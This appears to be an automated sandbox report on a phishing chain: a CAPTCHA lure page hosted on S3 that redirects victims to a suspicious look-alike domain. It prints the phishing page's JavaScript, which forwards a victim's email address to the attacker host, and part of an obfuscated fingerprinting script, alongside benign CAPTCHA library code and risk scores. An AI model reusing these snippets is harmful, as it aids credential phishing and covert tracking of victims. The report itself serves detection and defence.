| URL: https://www.freelancer.com Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": true,
"brand_spoofing_attempt": false,
"third_party_hosting": false
} |
URL: https://www.freelancer.com |
| URL: http://mandedmskhd.s3-website-us-west-2.amazonaws.com/ Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Complete the CAPTCHA to Proceed",
"prominent_button_name": "Submit",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": true,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false
} |
 |
| URL: http://mandedmskhd.s3-website-us-west-2.amazonaws.com/ Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Complete the CAPTCHA to Proceed",
"prominent_button_name": "Submit",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": true,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false
} |
 |
| URL: http://mandedmskhd.s3-website-us-west-2.amazonaws.com/ Model: Joe Sandbox AI | {
"brands": []
} |
|
| URL: https://hcaptcha.com/1/api.js... Model: Joe Sandbox AI | {
"risk_score": 2,
"reasoning": "This appears to be a legitimate Promise polyfill implementation from hCaptcha (as indicated by the license comment). It implements standard Promise functionality and doesn't contain any suspicious behaviors like data exfiltration, eval usage, or malicious redirects. The code is not obfuscated and follows standard programming practices."
} |
/* https://hcaptcha.com/license */
!function(){"use strict";function e(e){var t=this.constructor;return this.then((function(n){return t.resolve(e()).then((function(){return n}))}),(function(n){return t.resolve(e()).then((function(){return t.reject(n)}))}))}function t(e){return new this((function(t,n){if(!e||"undefined"==typeof e.length)return n(new TypeError(typeof e+" "+e+" is not iterable(cannot read property Symbol(Symbol.iterator))"));var r=Array.prototype.slice.call(e);if(0===r.length)return t([]);var i=r.length;function o(e,n){if(n&&("object"==typeof n||"function"==typeof n)){var a=n.then;if("function"==typeof a)return void a.call(n,(function(t){o(e,t)}),(function(n){r[e]={status:"rejected",reason:n},0==--i&&t(r)}))}r[e]={status:"fulfilled",value:n},0==--i&&t(r)}for(var a=0;a<r.length;a++)o(a,r[a])}))}var n=setTimeout,r="undefined"!=typeof setImmediate?setImmediate:null;function i(e){return Boolean(e&&"undefined"!=typeof e.length)}function o(){}function a(e){if(!(this instanceof a))throw new TypeError("Promises must be constructed via new");if("function"!=typeof e)throw new TypeError("not a function");this._state=0,this._handled=!1,this._value=undefined,this._deferreds=[],d(e,this)}function s(e,t){for(;3===e._state;)e=e._value;0!==e._state?(e._handled=!0,a._immediateFn((function(){var n=1===e._state?t.onFulfilled:t.onRejected;if(null!==n){var r;try{r=n(e._value)}catch(i){return void l(t.promise,i)}c(t.promise,r)}else(1===e._state?c:l)(t.promise,e._value)}))):e._deferreds.push(t)}function c(e,t){try{if(t===e)throw new TypeError("A promise cannot be resolved with itself.");if(t&&("object"==typeof t||"function"==typeof t)){var n=t.then;if(t instanceof a)return e._state=3,e._value=t,void u(e);if("function"==typeof n)return void d((r=n,i=t,function(){r.apply(i,arguments)}),e)}e._state=1,e._value=t,u(e)}catch(o){l(e,o)}var r,i}function l(e,t){e._state=2,e._value=t,u(e)}function u(e){2===e._state&&0===e._deferreds.length&&a._immediateFn((function(){e._handled||a._unhandledRejectionFn(e._value)}));for(var t=0,n=e._deferreds.length;t<n;t++)s(e,e._deferreds[t]);e._deferreds=null}function h(e,t,n){this.onFulfilled="function"==typeof e?e:null,this.onRejected="function"==typeof t?t:null,this.promise=n}function d(e,t){var n=!1;try{e((function(e){n||(n=!0,c(t,e))}),(function(e){n||(n=!0,l(t,e))}))}catch(r){if(n)return;n=!0,l(t,r)}}a.prototype["catch"]=function(e){return this.then(null,e)},a.prototype.then=function(e,t){var n=new this.constructor(o);return s(this,new h(e,t,n)),n},a.prototype["finally"]=e,a.all=function(e){return new a((function(t,n){if(!i(e))return n(new TypeError("Promise.all accepts an array"));var r=Array.prototype.slice.call(e);if(0===r.length)return t([]);var o=r.length;function a(e,i){try{if(i&&("object"==typeof i||"function"==typeof i)){var s=i.then;if("function"==typeof s)return void s.call(i,(function(t){a(e,t)}),n)}r[e]=i,0==--o&&t(r)}catch(c){n(c)}}for(var s=0;s<r.length;s++)a(s,r[s])}))},a.allSettled=t,a.resolve=function(e){return e&&"object"==typeof e&&e.constructor===a?e:new a((function(t){t(e)}))},a.reject=function(e){return new a((function(t,n){n(e)}))},a.race=function(e){return new a((function(t,n){if(!i(e))return n(new TypeError("Promise.race accepts an array"));for(var r=0,o=e.length;r<o;r++)a.resolve(e[r]).then(t,n)}))},a._immediateFn="function"==typeof r&&function(e){r(e)}||function(e){n(e,0)},a._unhandledRejectionFn=function(e){"undefined"!=typeof console&&console&&console.warn("Possible Unhandled Promise Rejection:",e)};var f=function(){if("undefined"!=typeof self)return self;if("undefined"!=typeof window)return window;if("undefined"!=typeof global)return global;throw new Error("unable to locate global object")}();function p(e,t,n){return t<=e&&e<=n}function m(e){if(e===undefined)return{};if(e===Object(e))return e;throw TypeError("Could not convert argument to dictionary")}"function"!=typeof f.Promise?f.Promise=a:(f.Promise.prototype["finally"]||(f.Promise.prototype["finally"]=e),f.Promise.allSettled| |
| URL: http://mandedmskhd.s3-website-us-west-2.amazonaws.com/ Model: Joe Sandbox AI | {
"brands": []
} |
|
| URL: http://mandedmskhd.s3-website-us-west-2.amazonaws.com/ Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Complete the CAPTCHA to Proceed",
"prominent_button_name": "Submit",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": true,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false
} |
 |
| URL: http://mandedmskhd.s3-website-us-west-2.amazonaws.com Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": true,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": true,
"brand_spoofing_attempt": false,
"third_party_hosting": true
} |
URL: http://mandedmskhd.s3-website-us-west-2.amazonaws.com |
| URL: http://mandedmskhd.s3-website-us-west-2.amazonaws.com/ Model: Joe Sandbox AI | {
"brands": []
} |
|
| URL: http://mandedmskhd.s3-website-us-west-2.amazonaws.... Model: Joe Sandbox AI | {
"risk_score": 8,
"reasoning": "High risk due to: 1) Redirect to suspicious domain with unusual formatting/naming pattern (+3), 2) URL obfuscation with random-looking query parameter 'StMH6X=X0Tzi' (+3), 3) Collecting and forwarding email parameter to unknown domain (+2). Domain 'lookingforwardllc.org' appears suspicious and follows common phishing patterns with long, deceptive naming."
} |
// Get the email from the URL parameter (you can dynamically grab it from your email sender system)
const urlParams = new URLSearchParams(window.location.search);
const email = urlParams.get('email') || ''; // Use the email passed in the URL or fallback
function handleSubmit() {
var redirectUrl = " https://voicenjsecurenaj.lookingforwardllc.org/?StMH6X=X0Tzi" + encodeURIComponent(email);
window.location.href = redirectUrl;
return false; // Prevent default form submission
}
|
| URL: https://newassets.hcaptcha.com/captcha/v1/d136a52/... Model: Joe Sandbox AI | {
"risk_score": 2,
"reasoning": "This appears to be a legitimate Promise polyfill implementation from hCaptcha (as indicated by the license comment). It implements standard Promise functionality and contains no malicious patterns. The code is not obfuscated and interacts only with standard browser APIs. The low risk score is assigned due to use of some legacy practices and global object manipulation."
} |
/* https://hcaptcha.com/license */
!function(){"use strict";function t(t){var e=this.constructor;return this.then((function(i){return e.resolve(t()).then((function(){return i}))}),(function(i){return e.resolve(t()).then((function(){return e.reject(i)}))}))}function e(t){return new this((function(e,i){if(!t||"undefined"==typeof t.length)return i(new TypeError(typeof t+" "+t+" is not iterable(cannot read property Symbol(Symbol.iterator))"));var n=Array.prototype.slice.call(t);if(0===n.length)return e([]);var r=n.length;function o(t,i){if(i&&("object"==typeof i||"function"==typeof i)){var s=i.then;if("function"==typeof s)return void s.call(i,(function(e){o(t,e)}),(function(i){n[t]={status:"rejected",reason:i},0==--r&&e(n)}))}n[t]={status:"fulfilled",value:i},0==--r&&e(n)}for(var s=0;s<n.length;s++)o(s,n[s])}))}var i=setTimeout,n="undefined"!=typeof setImmediate?setImmediate:null;function r(t){return Boolean(t&&"undefined"!=typeof t.length)}function o(){}function s(t){if(!(this instanceof s))throw new TypeError("Promises must be constructed via new");if("function"!=typeof t)throw new TypeError("not a function");this._state=0,this._handled=!1,this._value=undefined,this._deferreds=[],f(t,this)}function a(t,e){for(;3===t._state;)t=t._value;0!==t._state?(t._handled=!0,s._immediateFn((function(){var i=1===t._state?e.onFulfilled:e.onRejected;if(null!==i){var n;try{n=i(t._value)}catch(r){return void c(e.promise,r)}l(e.promise,n)}else(1===t._state?l:c)(e.promise,t._value)}))):t._deferreds.push(e)}function l(t,e){try{if(e===t)throw new TypeError("A promise cannot be resolved with itself.");if(e&&("object"==typeof e||"function"==typeof e)){var i=e.then;if(e instanceof s)return t._state=3,t._value=e,void h(t);if("function"==typeof i)return void f((n=i,r=e,function(){n.apply(r,arguments)}),t)}t._state=1,t._value=e,h(t)}catch(o){c(t,o)}var n,r}function c(t,e){t._state=2,t._value=e,h(t)}function h(t){2===t._state&&0===t._deferreds.length&&s._immediateFn((function(){t._handled||s._unhandledRejectionFn(t._value)}));for(var e=0,i=t._deferreds.length;e<i;e++)a(t,t._deferreds[e]);t._deferreds=null}function u(t,e,i){this.onFulfilled="function"==typeof t?t:null,this.onRejected="function"==typeof e?e:null,this.promise=i}function f(t,e){var i=!1;try{t((function(t){i||(i=!0,l(e,t))}),(function(t){i||(i=!0,c(e,t))}))}catch(n){if(i)return;i=!0,c(e,n)}}s.prototype["catch"]=function(t){return this.then(null,t)},s.prototype.then=function(t,e){var i=new this.constructor(o);return a(this,new u(t,e,i)),i},s.prototype["finally"]=t,s.all=function(t){return new s((function(e,i){if(!r(t))return i(new TypeError("Promise.all accepts an array"));var n=Array.prototype.slice.call(t);if(0===n.length)return e([]);var o=n.length;function s(t,r){try{if(r&&("object"==typeof r||"function"==typeof r)){var a=r.then;if("function"==typeof a)return void a.call(r,(function(e){s(t,e)}),i)}n[t]=r,0==--o&&e(n)}catch(l){i(l)}}for(var a=0;a<n.length;a++)s(a,n[a])}))},s.allSettled=e,s.resolve=function(t){return t&&"object"==typeof t&&t.constructor===s?t:new s((function(e){e(t)}))},s.reject=function(t){return new s((function(e,i){i(t)}))},s.race=function(t){return new s((function(e,i){if(!r(t))return i(new TypeError("Promise.race accepts an array"));for(var n=0,o=t.length;n<o;n++)s.resolve(t[n]).then(e,i)}))},s._immediateFn="function"==typeof n&&function(t){n(t)}||function(t){i(t,0)},s._unhandledRejectionFn=function(t){"undefined"!=typeof console&&console&&console.warn("Possible Unhandled Promise Rejection:",t)};var d=function(){if("undefined"!=typeof self)return self;if("undefined"!=typeof window)return window;if("undefined"!=typeof global)return global;throw new Error("unable to locate global object")}();function p(t,e,i){return e<=t&&t<=i}function y(t){if(t===undefined)return{};if(t===Object(t))return t;throw TypeError("Could not convert argument to dictionary")}"function"!=typeof d.Promise?d.Promise=s:(d.Promise.prototype["finally"]||(d.Promise.prototype["finally"]=t),d.Promise.allSettled| |
| URL: http://mandedmskhd.s3-website-us-west-2.amazonaws.com/ Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Complete the CAPTCHA to Proceed",
"prominent_button_name": "Submit",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": true,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false
} |
 |
| URL: http://mandedmskhd.s3-website-us-west-2.amazonaws.com/ Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Why did this happen?",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false
} |
 |
| URL: https://voicenjsecurenaj.lookingforwardllc.org/?StMH6X=X0Tzi Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Why did this happen?",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false
} |
|
| URL: http://mandedmskhd.s3-website-us-west-2.amazonaws.com/ Model: Joe Sandbox AI | {
"brands": []
} |
|
| URL: http://mandedmskhd.s3-website-us-west-2.amazonaws.com/ Model: Joe Sandbox AI | {
"brands": []
} |
|
| URL: https://voicenjsecurenaj.lookingforwardllc.org/?StMH6X=X0Tzi Model: Joe Sandbox AI | {
"brands": []
} |
|
| URL: https://voicenjsecurenaj.lookingforwardllc.org/?St... Model: Joe Sandbox AI | {
"risk_score": 8,
"reasoning": "Script shows multiple high-risk indicators: heavily obfuscated code (a0l4, a0l5 functions), encoded data arrays, and suspicious string manipulation. The presence of sensitive browser APIs (cookie access, canvas fingerprinting, WebGL) combined with obfuscation suggests potential malicious intent for data collection or exploitation."
} |
function a0l5(l,m){var C=a0l4();return a0l5=function(q,A){q=q-0x1cd;var v=C[q];return v;},a0l5(l,m);}function a0l4(){var B3=['exec','IE_PROTO','likrs','map','toDataURL','cookie','','components','Promise\x20can\x27t\x20be\x20resolved\x20itself','#FollowUs','div[class$=\x22-hide\x22][zoompage-fontsize][style=\x22display:\x20block;\x22]','java','Not\x20enough\x20arguments','devicePixelRatio','puffinDevice','Vrinda','msPointerEnabled','contentWindow','Univers\x20CE\x2055\x20Medium','dflSJ','#ac-lre-player','unsupported','.yt.btn-link.btn-md.btn','KeMJX','visibility','WEBGL_polygon_mode','language','aeSoi','symbol','xeryt','3010jEWTrM','SNQHj','getStorageUpdates','PMingLiU','MacIntel','AsyncFunction','#f9c','jBxpb','(?<a>b)','lvorc','yPezv','LtFBO','\x20is\x20not\x20an\x20object','','rgba(102,\x20204,\x200,\x200.2)','webgl2','file:','.cnt-publi','MessageChannel','facade','["692f6f727a72714225334", "433253743716a6d637371", "716b6d737a63726774317", "625374472706774696477", "70253742672537436f767", "a6e352537447869253344", "4751253743534a395a4b5", "937522543322538306b25", "3230302e2e39253344253", "346253341336e38253630", "336e64686435253341682", "533412533422533423925", "334630693725363025334", "461253344366f696d3038", "6b61253238362e2532412", "533453069253342253343", "253344302533422533453", "66c6e3039372533412533", "45686e253344336f37346", "a25334462352536306167", "2533412d362e253744797", "36b362e25324158777833", "567225323035253237253", "2302537446f2536306870", "692537436f25374425324", "325334125323125323962", "786b7469702e322532322", "d25374463756a2537436f", "253746253742253241253", "341253230253238612535", "436f7a6c7567253742776", "d4d424d652535436e6d25", "37442537466b637825324", "32533412532342532306f", "67767725354463756a253", "7436f2537462537422532", "412533412532302532386", "12537436f7a6c75672537", "4277253230302e2e65617", "86f2536306d7967253743", "6f7067716f786b737e6d6", "b75253230322532322532", "30676d6c786b796f70626", "a7467767365726d253238", "362532332532436d62253", "74363686e706d746d7861", "6e786f757a6f7a6f25323", "0302e2e65612537436f7a", "6c7567253742776d69746", "172253746627e632f332e", "253238616d6e766c786b7", "96f70626a746776736572", "6d2532383625323325324", "36d626b706f78637a6d25", "37447479253744637e716", "a62253238362e2532416d", "632537446f6d6e7068253", "7446378617376757e6772", "736f622f332e253238616", "d25374263746b706a2537", "46253742627a253743253", "7442537436f747e6d6a25", "324337253232253230626", "4647e6e706d746d78617e", "7075253746667e766f622", "532412533412532302532", "386125363079636f6b706", "f78637a6d253746692537", "436a7272626d73746d253", "230302e2e696377762535", "4569662537437a7125374", "225324125334125323025", "323861736a6f732537422", "537447325324325334125", "3234253230706e63717e2", "537447425323925334125", "32362532436569724e677", "e2537466f707825323925", "334125323625324355692", "536305f756d746f722f33", "2e2532385725374425433", "2253832556d6825354470", "6d796c253742253230322", "532322532302535426371", "2537426f717e737425323", "96b313332383839333634", "3438373138303438"]','result','src','iterator','getterFor','groups','SyYCU','exports','','FcVTU','','experimental-webgl','','betiI','vendor','Idneg','textBaseline','zSTSH','\x09\x0a\x0b\x0c\x0d\x20\u00a0\u1680\u2000\u2001\u2002\u2003\u2004\u2005\u2006\u2007\u2008\u2009\u200a\u202f\u205f\u3000\u2028\u2029\ufeff','KIzAI','notifications','for','onorientationchange','toStringTag','ignoreCase','crjZv','$<a>c','Cloudflare-Workers','test','bvZIv','deviceMemory','description\x20detection','VdamH','running','label','#SidebarIklan-wrapper','ApplePayError','availHeight','sinh','pkJoo','canvas','resolvedOptions','userLanguage','rejectionhandled','Microsoft\x20Uighur','ongestureend','#subscribe_popup','getPrototypeOf','zUztA','submit','vtSfR','1000000000000000128','#sovrn_container','htmlfile','TRAJAN\x20PRO','Copy\x20the\x20text\x20below\x20to\x20get\x20the\x20debug\x20data:\x0a\x0a```\x0aversion:\x20','kIwhK','classList','ARNO\x20PRO','OFdna','WebKitMediaKeys','Date |
| URL: https://newassets.hcaptcha.com/c/cc9cbcc44893d9601... Model: Joe Sandbox AI | {
"risk_score": 3,
"reasoning": "This code appears to be a legitimate text encoding/decoding implementation (likely UTF-8). While it uses some complex logic and type checking, it doesn't exhibit malicious behaviors. The code contains standard character encoding operations, array manipulations, and proper error handling. No external communications, eval(), or suspicious DOM manipulations are present."
} |
var hsw=function YRIR(){"use strict";function A(A,Q,B){return Q<=A&&A<=B}function Q(A){if(void 0===A)return{};if(A===Object(A))return A;throw TypeError("Could not convert argument to dictionary")}var B=function(A){return A>=0&&A<=127},E=-1;function I(A){this.tokens=[].slice.call(A),this.tokens.reverse()}I.prototype={endOfStream:function(){return!this.tokens.length},read:function(){return this.tokens.length?this.tokens.pop():E},prepend:function(A){if(Array.isArray(A))for(var Q=A;Q.length;)this.tokens.push(Q.pop());else this.tokens.push(A)},push:function(A){if(Array.isArray(A))for(var Q=A;Q.length;)this.tokens.unshift(Q.shift());else this.tokens.unshift(A)}};var C=-1;function g(A,Q){if(A)throw TypeError("Decoder error");return Q||65533}function D(A){return A=String(A).trim().toLowerCase(),Object.prototype.hasOwnProperty.call(w,A)?w[A]:null}var w={};[{encodings:[{labels:["unicode-1-1-utf-8","utf-8","utf8"],name:"UTF-8"}],heading:"The Encoding"}].forEach((function(A){A.encodings.forEach((function(A){A.labels.forEach((function(Q){w[Q]=A}))}))}));var h,i,k={"UTF-8":function(A){return new L(A)}},M={"UTF-8":function(A){return new s(A)}},J="utf-8";function G(A,B){if(!(this instanceof G))throw TypeError("Called as a function. Did you forget 'new'?");A=void 0!==A?String(A):J,B=Q(B),this._encoding=null,this._decoder=null,this._ignoreBOM=!1,this._BOMseen=!1,this._error_mode="replacement",this._do_not_flush=!1;var E=D(A);if(null===E||"replacement"===E.name)throw RangeError("Unknown encoding: "+A);if(!M[E.name])throw Error("Decoder not present. Did you forget to include encoding-indexes.js first?");var I=this;return I._encoding=E,B.fatal&&(I._error_mode="fatal"),B.ignoreBOM&&(I._ignoreBOM=!0),Object.defineProperty||(this.encoding=I._encoding.name.toLowerCase(),this.fatal="fatal"===I._error_mode,this.ignoreBOM=I._ignoreBOM),I}function y(A,B){if(!(this instanceof y))throw TypeError("Called as a function. Did you forget 'new'?");B=Q(B),this._encoding=null,this._encoder=null,this._do_not_flush=!1,this._fatal=B.fatal?"fatal":"replacement";var E=this;if(B.NONSTANDARD_allowLegacyEncoding){var I=D(A=void 0!==A?String(A):J);if(null===I||"replacement"===I.name)throw RangeError("Unknown encoding: "+A);if(!k[I.name])throw Error("Encoder not present. Did you forget to include encoding-indexes.js first?");E._encoding=I}else E._encoding=D("utf-8");return Object.defineProperty||(this.encoding=E._encoding.name.toLowerCase()),E}function s(Q){var B=Q.fatal,I=0,D=0,w=0,h=128,i=191;this.handler=function(Q,k){if(k===E&&0!==w)return w=0,g(B);if(k===E)return C;if(0===w){if(A(k,0,127))return k;if(A(k,194,223))w=1,I=31&k;else if(A(k,224,239))224===k&&(h=160),237===k&&(i=159),w=2,I=15&k;else{if(!A(k,240,244))return g(B);240===k&&(h=144),244===k&&(i=143),w=3,I=7&k}return null}if(!A(k,h,i))return I=w=D=0,h=128,i=191,Q.prepend(k),g(B);if(h=128,i=191,I=I<<6|63&k,(D+=1)!==w)return null;var M=I;return I=w=D=0,M}}function L(Q){Q.fatal,this.handler=function(Q,I){if(I===E)return C;if(B(I))return I;var g,D;A(I,128,2047)?(g=1,D=192):A(I,2048,65535)?(g=2,D=224):A(I,65536,1114111)&&(g=3,D=240);for(var w=[(I>>6*g)+D];g>0;){var h=I>>6*(g-1);w.push(128|63&h),g-=1}return w}}Object.defineProperty&&(Object.defineProperty(G.prototype,"encoding",{get:function(){return this._encoding.name.toLowerCase()}}),Object.defineProperty(G.prototype,"fatal",{get:function(){return"fatal"===this._error_mode}}),Object.defineProperty(G.prototype,"ignoreBOM",{get:function(){return this._ignoreBOM}})),G.prototype.decode=function(A,B){var g;g="object"==typeof A&&A instanceof ArrayBuffer?new Uint8Array(A):"object"==typeof A&&"buffer"in A&&A.buffer instanceof ArrayBuffer?new Uint8Array(A.buffer,A.byteOffset,A.byteLength):new Uint8Array(0),B=Q(B),this._do_not_flush||(this._decoder=M[this._encoding.name]({fatal:"fatal"===this._error_mode}),this._BOMseen=!1),this._do_not_flush=Boolean(B.stream);for(var D,w=new I(g),h=[];;){var i=w.read();if(i===E)break;if((D=this._decoder.handler(w,i))===C)break;null!==D&&(Array.isA |
| URL: https://www.google.com/recaptcha/api.js... Model: Joe Sandbox AI | {
"risk_score": 2,
"reasoning": "This is Google's reCAPTCHA initialization script. It loads from trusted Google domains (google.com, gstatic.com), includes integrity checks (SHA-384 hash), proper cross-origin handling, and nonce security measures. The script follows security best practices including async loading and origin trial meta tag implementation. The only minor risk factors are DOM manipulation and external script loading, but these are necessary for legitimate reCAPTCHA functionality."
} |
/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var gr=w[N]=w[N]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};w['__recaptcha_api']='https://www.google.com/recaptcha/api2/';(cfg['render']=cfg['render']||[]).push('onload');w['__google_recaptcha_client']=true;var d=document,po=d.createElement('script');po.type='text/javascript';po.async=true; po.charset='utf-8';var v=w.navigator,m=d.createElement('meta');m.httpEquiv='origin-trial';m.content='A/kargTFyk8MR5ueravczef/wIlTkbVk1qXQesp39nV+xNECPdLBVeYffxrM8TmZT6RArWGQVCJ0LRivD7glcAUAAACQeyJvcmlnaW4iOiJodHRwczovL2dvb2dsZS5jb206NDQzIiwiZmVhdHVyZSI6IkRpc2FibGVUaGlyZFBhcnR5U3RvcmFnZVBhcnRpdGlvbmluZzIiLCJleHBpcnkiOjE3NDIzNDIzOTksImlzU3ViZG9tYWluIjp0cnVlLCJpc1RoaXJkUGFydHkiOnRydWV9';if(v&&v.cookieDeprecationLabel){v.cookieDeprecationLabel.getValue().then(function(l){if(l!=='treatment_1.1'&&l!=='treatment_1.2'&&l!=='control_1.1'){d.head.prepend(m);}});}else{d.head.prepend(m);}po.src='https://www.gstatic.com/recaptcha/releases/MskOi9BoTT5Vt82JMh92Dvhu/recaptcha__en.js';po.crossOrigin='anonymous';po.integrity='sha384-C7K+YJU/KVNFPOC/sHMi50llgz/xfUjQTDZSx4dx4nvgezPd7hoRBARbx1xnmxoR';var e=d.querySelector('script[nonce]'),n=e&&(e['nonce']||e.getAttribute('nonce'));if(n){po.setAttribute('nonce',n);}var s=d.getElementsByTagName('script')[0];s.parentNode.insertBefore(po, s);})();
|
| URL: https://voicenjsecurenaj.lookingforwardllc.org Model: Joe Sandbox AI | {
"typosquatting": true,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": true,
"malicious_keywords": true,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": true,
"third_party_hosting": true
} |
URL: https://voicenjsecurenaj.lookingforwardllc.org |
| URL: https://voicenjsecurenaj.lookingforwardllc.org/?StMH6X=X0Tzi Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Why did this happen?",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": true,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false
} |
 |
| URL: https://voicenjsecurenaj.lookingforwardllc.org/?StMH6X=X0Tzi Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Why did this happen?",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": true,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false
} |
 |
| URL: https://voicenjsecurenaj.lookingforwardllc.org/?StMH6X=X0Tzi Model: Joe Sandbox AI | {
"brands": []
} |
 |
| URL: https://www.google.com/recaptcha/api2/anchor?ar=1&... Model: Joe Sandbox AI | {
"risk_score": 1,
"reasoning": "This is a legitimate script setting up the Google reCAPTCHA API endpoint. It's a common and safe practice used for implementing CAPTCHA verification. The domain is trusted (google.com), and the variable naming convention matches Google's official reCAPTCHA implementation."
} |
window['__recaptcha_api'] = 'https://www.google.com/recaptcha/api2/';
|
| URL: https://voicenjsecurenaj.lookingforwardllc.org/?StMH6X=X0Tzi Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Why did this happen?",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": true,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false
} |
 |
| URL: https://www.google.com/recaptcha/api2/webworker.js... Model: Joe Sandbox AI | {
"risk_score": 2,
"reasoning": "The script imports Google's reCAPTCHA service from a legitimate, trusted domain (gstatic.com). While importScripts can be risky in general, this is a standard implementation of reCAPTCHA in a Web Worker context. The domain is verified Google infrastructure, and the pattern matches legitimate reCAPTCHA usage."
} |
importScripts('https://www.gstatic.com/recaptcha/releases/MskOi9BoTT5Vt82JMh92Dvhu/recaptcha__en.js');
|
| URL: https://www.gstatic.com/recaptcha/releases/MskOi9B... Model: Joe Sandbox AI | {
"risk_score": 2,
"reasoning": "This appears to be a legitimate Google Closure Library code snippet with proper copyright notices and standard JavaScript operations. It contains obfuscated code (minified/compiled) which is normal for production libraries, and performs standard operations like event handling and data manipulation. No high-risk behaviors like eval() or suspicious network calls are present."
} |
(function(){/*
Copyright The Closure Library Authors.
SPDX-License-Identifier: Apache-2.0
*/
/*
Copyright Google LLC
SPDX-License-Identifier: Apache-2.0
*/
/*
Copyright The Closure Library Authors.
SPDX-License-Identifier: Apache-2.0
*/
/*
Copyright 2005, 2007 Bob Ippolito. All Rights Reserved.
Copyright The Closure Library Authors.
SPDX-License-Identifier: MIT
*/
var d=function(){return[function(N,a,U,y,A,l){return((N^20)&13)==(N-6<((N>>2&14)>=((N+4^20)>=((A=[0,"P","Tx"],(N&71)==N)&&(y=d[7](86,U[A[1]]),l=r[6](2," > ",a,y,U[A[1]])),N)&&(N+2^22)<N&&(U=[34,1023,"ubd"],AD.call(this,e[37](51,U[2]),m[49](73,rK),"POST"),m[49](25,14,e[28](73,1,r[29](7,U[A[0]],U[1],a))),this[A[1]]=a.U()),12)&&(N+1&10)<10&&J.call(this,a,A[0],"conf"),14)&&((N|5)&15)>=1&&(this[A[1]]=new er,this.size=A[0]),1)&&(l=y&&U[A[2]]()>a?y():null),l},function(N,a,U,y,A,l,z,u,p,x){return(N+6&7)==
(((N-1|(x=((N>>2&10)==2&&(this.B=a,this.P=U),[20,13,36]),x[2]))<N&&(N+3&51)>=N&&(F[48](21,y,l.P),(u=l.P.G)?p=m[35](29,U,l,"return"in u?u[A]:function(S){return{value:S,done:!0}},z,l.P.return):(l.P.return(z),p=T[2](78,a,l))),(N<<2&x[1])>=6&&(N^5)<x[0])&&(this.B=this.P=this.Z=a),1)&&(this.message=a,this.messageType=U,this.P=y),p},function(N,a,U,y,A,l,z,u,p,x,S,Z,W){if(((((W=[45,"P",2],N>>1)&3)==1&&(Z=F[41](W[2],null,function(){return r[30](45).frames})),((N^19)&7)==W[2]&&(U.t1=!0,U.listener=a,U.proxy=
a,U.src=a,U.aL=a),N)-6|49)<N&&(N+7&61)>=N&&(z=[32,"number",4294967295],l!=null))switch(H[43](17,U,A,y),typeof l){case z[1]:(x=y[W[1]],me(l),T)[15](W[2],U,l),F[W[0]](19,JD,x,Fr);break;case a:u=new oI((S=BigInt.asUintN(64,l),Number(S&BigInt(z[W[2]]))),Number(S>>BigInt(z[0]))),F[W[0]](16,u.B,y[W[1]],u[W[1]]);break;default:p=H[17](W[2],16,null,l),F[W[0]](18,p.B,y[W[1]],p[W[1]])}return Z},function(N,a,U,y,A,l,z,u,p,x,S,Z,W){if((N>>1&((N&(((N^10)&(W=["test","patreq",null],15)||(window.addEventListener?
window.addEventListener(y,A,a):window.attachEvent&&window.attachEvent(U,A)),N)-3&15||J.call(this,a,0,W[1]),56))==N&&(x=e[10](59,z).toString(),S=x.split(/[?#]/),p=/[?]/[W[0]](x)?U+S[y]:"",u=/[#]/[W[0]](x)?a+(p?S[2]:S[y]):"",Z=e[10](8,W[2],0,"&","=",l,S[A],u,p)),3))==3)if(y=a,LV!==""&&Xr){try{U=function(P){return P},y=Xr.createPolicy(LV,{createHTML:U,createScript:U,createScriptURL:U})}catch(P){}Z=y}else Z=y;return Z},function(N,a,U,y,A,l,z){return(((N|(((z=["BV",0,1],N)-5|58)>=N&&N-7<<z[2]<N&&(wK=U,
